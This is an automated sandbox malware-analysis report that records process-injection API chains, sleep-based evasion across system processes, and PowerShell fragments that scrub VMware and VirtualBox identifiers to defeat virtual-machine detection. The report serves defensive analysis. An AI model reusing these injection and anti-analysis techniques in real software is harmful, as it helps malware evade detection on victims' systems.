      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,16_2_00007FF6CD4110C0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6409Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3304Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4586Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5266Jump to behavior
      Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1751Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7969Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1563Jump to behavior
      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1712
      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8288
      Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 7984
      Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 1986
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 3988
      Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9864
      Source: C:\Users\user\AppData\Local\Temp\svc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmpJump to dropped file
      Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_24-14130
      Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_26-14035
      Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_25-14042
      Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_23-14038
      Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_16-448
      Source: C:\Windows\System32\lsass.exeAPI coverage: 8.3 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.0 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.5 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 7.3 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.0 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 7.5 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 7.3 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.5 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 7.0 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 4586 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 5266 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -8301034833169293s >= -30000sJump to behavior
      Source: C:\Windows\System32\dialer.exe TID: 7916Thread sleep count: 1751 > 30Jump to behavior
      Source: C:\Windows\System32\dialer.exe TID: 7916Thread sleep time: -175100s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep count: 7969 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep count: 1563 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Windows\System32\winlogon.exe TID: 8132Thread sleep count: 1712 > 30
      Source: C:\Windows\System32\winlogon.exe TID: 8132Thread sleep time: -1712000s >= -30000s
      Source: C:\Windows\System32\winlogon.exe TID: 8132Thread sleep count: 8288 > 30
      Source: C:\Windows\System32\winlogon.exe TID: 8132Thread sleep time: -8288000s >= -30000s
      Source: C:\Windows\System32\lsass.exe TID: 8144Thread sleep count: 7984 > 30
      Source: C:\Windows\System32\lsass.exe TID: 8144Thread sleep time: -7984000s >= -30000s
      Source: C:\Windows\System32\lsass.exe TID: 8144Thread sleep count: 1986 > 30
      Source: C:\Windows\System32\lsass.exe TID: 8144Thread sleep time: -1986000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 8152Thread sleep count: 3988 > 30
      Source: C:\Windows\System32\svchost.exe TID: 8152Thread sleep time: -3988000s >= -30000s
      Source: C:\Windows\System32\dwm.exe TID: 8180Thread sleep count: 9864 > 30
      Source: C:\Windows\System32\dwm.exe TID: 8180Thread sleep time: -9864000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 8188Thread sleep count: 252 > 30
      Source: C:\Windows\System32\svchost.exe TID: 8188Thread sleep time: -252000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 5216Thread sleep count: 253 > 30
      Source: C:\Windows\System32\svchost.exe TID: 5216Thread sleep time: -253000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6024Thread sleep count: 253 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6024Thread sleep time: -253000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 4444Thread sleep count: 248 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4444Thread sleep time: -248000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7060Thread sleep count: 195 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7060Thread sleep time: -195000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 4504Thread sleep count: 253 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4504Thread sleep time: -253000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7108Thread sleep count: 239 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7108Thread sleep time: -239000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7264Thread sleep count: 249 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7264Thread sleep time: -249000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7284Thread sleep count: 253 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7284Thread sleep time: -253000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7424Thread sleep count: 252 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7424Thread sleep time: -252000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6672Thread sleep count: 246 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6672Thread sleep time: -246000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6304Thread sleep count: 240 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6304Thread sleep time: -240000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7400Thread sleep count: 252 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7400Thread sleep time: -252000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 5348Thread sleep count: 253 > 30
      Source: C:\Windows\System32\svchost.exe TID: 5348Thread sleep time: -253000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7364Thread sleep count: 254 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7364Thread sleep time: -254000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7540Thread sleep count: 252 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7540Thread sleep time: -252000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7548Thread sleep count: 246 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7548Thread sleep time: -246000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7380Thread sleep count: 249 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7380Thread sleep time: -249000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7356Thread sleep count: 250 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7356Thread sleep time: -250000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7328Thread sleep count: 245 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7328Thread sleep time: -245000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7628Thread sleep count: 251 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7628Thread sleep time: -251000s >= -30000s
      Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
      Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC64BE3C FindFirstFileExW,23_2_00000225DC64BE3C
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AEBE3C FindFirstFileExW,24_2_00000202C0AEBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A66130BE3C FindFirstFileExW,25_2_000002A66130BE3C
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDBBE3C FindFirstFileExW,26_2_000002BAAEDBBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879CBE3C FindFirstFileExW,27_2_0000026A879CBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537ABE3C FindFirstFileExW,28_2_00000179537ABE3C
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D56BE3C FindFirstFileExW,29_2_000002295D56BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E6BE3C FindFirstFileExW,30_2_0000025306E6BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3BBE3C FindFirstFileExW,31_2_000001845B3BBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD4BE3C FindFirstFileExW,32_2_000001ADECD4BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55907BE3C FindFirstFileExW,34_2_000001D55907BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EABE3C FindFirstFileExW,35_2_00000241A9EABE3C
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7319BE3C FindFirstFileExW,36_2_000001CD7319BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E89BE3C FindFirstFileExW,37_2_000002824E89BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B3BE3C FindFirstFileExW,38_2_0000021B47B3BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002087006BE3C FindFirstFileExW,39_2_000002087006BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_000001718426BE3C FindFirstFileExW,40_2_000001718426BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FABE3C FindFirstFileExW,41_2_0000023FD3FABE3C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
      Source: svchost.exe, 00000022.00000003.1882739844.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: svchost.exe, 0000001F.00000002.2928078330.000001845AC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
      Source: svchost.exe, 00000022.00000003.1882739844.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
      Source: svchost.exe, 00000022.00000003.1882739844.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
      Source: dwm.exe, 0000001A.00000000.1790714487.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
      Source: svchost.exe, 00000022.00000003.1875075934.000001D5593A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
      Source: svchost.exe, 00000022.00000003.1882739844.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
      Source: powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: svchost.exe, 00000022.00000000.1855705571.000001D559C7F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
      Source: svchost.exe, 00000022.00000003.1884822453.000001D559392000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
      Source: svchost.exe, 00000022.00000000.1844327938.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
      Source: powershell.exe, 00000001.00000002.1737121378.0000000007C5B000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775494607.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928082321.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2923297704.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1783837643.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.1814272317.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2922428945.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2921858138.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1816889547.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1824488143.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2928574276.000001845AC3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: svchost.exe, 00000019.00000000.1783876647.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
      Source: svchost.exe, 00000022.00000000.1840676938.000001D558693000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
      Source: lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
      Source: svchost.exe, 00000022.00000000.1844327938.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
      Source: svchost.exe, 00000022.00000003.1882739844.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
      Source: powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: svchost.exe, 00000022.00000003.1884822453.000001D559392000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
      Source: lsass.exe, 00000018.00000002.2945755544.00000202C037F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
      Source: svchost.exe, 00000022.00000003.1882739844.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
      Source: svchost.exe, 00000022.00000000.1844327938.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
      Source: svchost.exe, 00000022.00000002.2926489554.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
